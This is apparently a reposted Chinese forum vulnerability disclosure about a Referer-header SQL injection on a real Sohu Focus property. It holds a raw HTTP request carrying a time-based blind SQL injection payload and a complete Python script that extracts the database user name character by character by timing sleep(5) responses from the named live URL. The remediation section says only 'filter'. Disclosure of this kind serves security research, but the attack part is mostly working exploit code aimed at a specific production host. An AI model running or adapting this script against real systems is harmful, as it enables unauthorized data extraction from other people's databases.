HanDs
NO.2

[7月漏洞公开] 搜狐焦点一处referer注入(附验证脚本) 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

66666

详细说明:

1,请求头:

code 区域
GET /decorstuffview/654294.html HTTP/1.1
Referer: if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
X-Requested-With: XMLHttpRequest
Host: home.focus.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*













2,判断user长度为20

QQ截图20160524203300.png



QQ截图20160524203336.png









QQ截图20160524205341.png

漏洞证明:

code 区域
import requests
import time



payloads='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789@_.'

user=''



print 'Start to retrive database user:'



for i in range(1,21):



for payload in payloads:



para='if(now()=sysdate(),sleep(0),0)/*\'XOR(if(ascii(substr(user(),%s,1))=%s,sleep(5),0))OR\'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/' % (i, ord(payload))



headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21',

'X-Requested-With': 'XMLHttpRequest',

'Referer':para,

}






start_time = time.time()
response=requests.get('http://home.focus.cn/decorstuffview/654294.html',headers=headers)



if time.time()-start_time > 4.9 :



user+=payload



print '\n user is:',user,



break



else:



print '.',



print '\n[Done] database user is %s' %user

修复方案:

过滤。


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
搜狐 焦点 r ef er er
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组